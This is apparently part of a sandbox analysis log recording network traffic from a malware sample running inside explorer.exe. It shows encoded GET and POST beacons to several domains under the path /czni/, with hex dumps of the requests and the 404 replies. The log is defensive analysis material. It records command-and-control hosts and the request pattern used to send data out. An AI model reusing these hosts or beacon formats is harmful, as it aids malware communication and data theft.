2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38
                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.651-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8
                                                                          Jan 30, 2023 13:41:06.251593113 CET818INData Raw: 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 35 36 2d 32 2e 38 32 2c 33 2e 31 38 31 2d 34 2e 38 36 38 2c 36 2e 30 38 38 2d 35 2e 31 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 36 2e
                                                                          Data Ascii: .66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <
                                                                          Jan 30, 2023 13:41:06.251631021 CET819INData Raw: 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 34 38 33 2e 39 38 35 2c 31 32 37 2e 34 33 63 32 33 2e 34 36 32 2c 31 2e 35 33
                                                                          Data Ascii: ="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g>
                                                                          Jan 30, 2023 13:41:06.251667976 CET820INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72
                                                                          Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g>
                                                                          Jan 30, 2023 13:41:06.251743078 CET821INData Raw: 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                                                          Data Ascii: x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                                                          Jan 30, 2023 13:41:06.251776934 CET823INData Raw: 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74
                                                                          Data Ascii: y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146" /> </g>
                                                                          Jan 30, 2023 13:41:06.251925945 CET824INData Raw: 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22
                                                                          Data Ascii: oke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                          Jan 30, 2023 13:41:06.251960993 CET826INData Raw: 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36
                                                                          Data Ascii: 0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="url(cordClip)"> <path id="co
                                                                          Jan 30, 2023 13:41:06.252070904 CET827INData Raw: 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33
                                                                          Data Ascii: 53.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.375" /> </g>
                                                                          Jan 30, 2023 13:41:06.252104044 CET828INData Raw: 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35 2e 31 33 34 2c 31 38 2e 39 39 39 68 30 0a 09 09 09 09 63 33 2e 38 32 39 2c 36 2e 36 36 34 2c 31 32 2e 33
                                                                          Data Ascii: .536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                                                                          Jan 30, 2023 13:41:06.418104887 CET830INData Raw: 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 6c 65
                                                                          Data Ascii: 54,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          15192.168.2.549724199.192.28.12180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:08.676759005 CET832OUTGET /czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.deglaz.xyz
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:08.968935966 CET834INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:08 GMT
                                                                          Server: Apache
                                                                          Content-Length: 16026
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 63 2d 31 2e 32 34 37 2c 34 2e 36 35 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30
                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.651-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.10
                                                                          Jan 30, 2023 13:41:08.969012022 CET835INData Raw: 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 35 36 2d 32 2e 38 32 2c 33 2e 31 38 31 2d 34 2e 38 36 38 2c 36 2e 30 38 38 2d 35 2e 31 33 0a 20 20 20 20
                                                                          Data Ascii: 1-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath>
                                                                          Jan 30, 2023 13:41:08.969063044 CET836INData Raw: 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 34 38 33 2e 39 38 35 2c 31 32 37
                                                                          Data Ascii: stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig">
                                                                          Jan 30, 2023 13:41:08.969110966 CET838INData Raw: 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74
                                                                          Data Ascii: .952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g>
                                                                          Jan 30, 2023 13:41:08.969162941 CET839INData Raw: 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20
                                                                          Data Ascii: 5" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" />
                                                                          Jan 30, 2023 13:41:08.969213009 CET840INData Raw: 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36
                                                                          Data Ascii: 7" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="411.146" /> </g>
                                                                          Jan 30, 2023 13:41:08.969527006 CET842INData Raw: 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20
                                                                          Data Ascii: e="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit
                                                                          Jan 30, 2023 13:41:08.969578981 CET843INData Raw: 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                                                          Data Ascii: <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="url(cordClip)">
                                                                          Jan 30, 2023 13:41:08.969631910 CET844INData Raw: 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20
                                                                          Data Ascii: "295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.375" /> </g
                                                                          Jan 30, 2023 13:41:08.969680071 CET846INData Raw: 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35 2e 31 33 34 2c 31 38 2e 39 39 39 68 30 0a 09 09 09 09 63 33
                                                                          Data Ascii: 1,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejo
                                                                          Jan 30, 2023 13:41:09.139417887 CET847INData Raw: 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20
                                                                          Data Ascii: 6.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoi


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          16192.168.2.5497262.57.90.1680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:14.234744072 CET857OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.laylaroseuk.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.laylaroseuk.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.laylaroseuk.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 50 47 68 5a 53 32 63 35 63 55 7a 37 56 63 49 59 4a 58 61 47 65 2d 4e 58 36 76 33 59 64 74 67 32 41 35 63 72 4c 6d 56 56 62 4c 6f 59 4c 37 7a 6a 6a 49 6f 56 38 56 66 65 4c 34 35 55 7a 79 53 53 47 64 53 4c 4f 77 78 66 6d 67 36 31 4e 54 33 68 52 33 28 64 6d 35 55 48 67 67 42 37 53 55 50 48 46 48 65 65 51 38 55 53 77 35 30 6c 6c 53 63 2d 46 43 50 72 70 53 6f 6d 4b 39 5a 68 53 61 34 52 36 71 6c 62 48 6e 4a 4c 54 67 50 41 47 56 55 37 28 72 36 46 65 42 77 46 45 46 28 66 53 44 32 6a 6c 4c 59 74 5a 32 32 44 63 77 69 41 4f 52 37 6c 63 51 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=PGhZS2c5cUz7VcIYJXaGe-NX6v3Ydtg2A5crLmVVbLoYL7zjjIoV8VfeL45UzySSGdSLOwxfmg61NT3hR3(dm5UHggB7SUPHFHeeQ8USw50llSc-FCPrpSomK9ZhSa4R6qlbHnJLTgPAGVU7(r6FeBwFEF(fSD2jlLYtZ22DcwiAOR7lcQ).
                                                                          Jan 30, 2023 13:41:14.270874023 CET857INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:41:14 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          17192.168.2.5497272.57.90.1680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:16.793785095 CET858OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg== HTTP/1.1
                                                                          Host: www.laylaroseuk.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:16.829987049 CET859INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:41:16 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          18192.168.2.549728142.44.131.17780C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:24.053550005 CET860OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.lakeviewautomation.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.lakeviewautomation.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.lakeviewautomation.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 43 6e 64 5f 35 30 51 36 36 69 6f 5a 4d 63 65 55 52 47 70 43 4f 5a 34 44 4d 63 65 77 4a 67 59 6e 46 74 67 49 38 6d 78 31 45 71 6b 49 37 52 58 5f 6f 55 73 6a 6f 57 43 4e 6f 62 33 69 52 51 31 61 6e 4f 4b 30 41 58 67 74 77 6c 4b 4d 42 4d 48 6a 43 63 6c 39 52 30 71 76 58 43 5a 4e 31 62 62 6e 74 41 75 33 63 48 47 6f 38 6b 31 61 50 73 63 57 7e 30 66 70 50 70 42 59 28 4b 79 6b 33 6f 35 66 32 2d 38 39 6e 65 5a 65 65 48 36 77 75 57 52 5a 75 54 6a 37 47 54 6b 6d 54 44 57 68 48 43 70 47 52 44 6a 5a 47 73 58 64 64 42 51 30 58 33 51 72 67 77 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=Cnd_50Q66ioZMceURGpCOZ4DMcewJgYnFtgI8mx1EqkI7RX_oUsjoWCNob3iRQ1anOK0AXgtwlKMBMHjCcl9R0qvXCZN1bbntAu3cHGo8k1aPscW~0fpPpBY(Kyk3o5f2-89neZeeH6wuWRZuTj7GTkmTDWhHCpGRDjZGsXddBQ0X3Qrgw).
                                                                          Jan 30, 2023 13:41:24.698982954 CET861INData Raw: bb d6 e0 d6 31 7a c3 cf c6 58 ce b0 3e 6b d4 14 c3 f8 1c f7 61 38 1c 62 98 e9 87 be 9a 63 d9 34 52 4d 30 4d 7b 24 5d 5c 25 31 76 1a cf d9 75 c0 42 ca 86 67 15 96 36 29 0c a9 d4 7a 7b 5b 34 2b fb c2 ca 0e 5e 4d 26 00 76 7b db 29 08 4a 7c 85 dd 36
                                                                          Data Ascii: 1zX>ka8bc4RM0M{$]\%1vuBg6)z{[4+^M&v{)J|6~;BW%`aa_$xr8_-clGKw'T:O4?Ta=N/s$~I@+6Ioxj!B:8HRA$2dB0
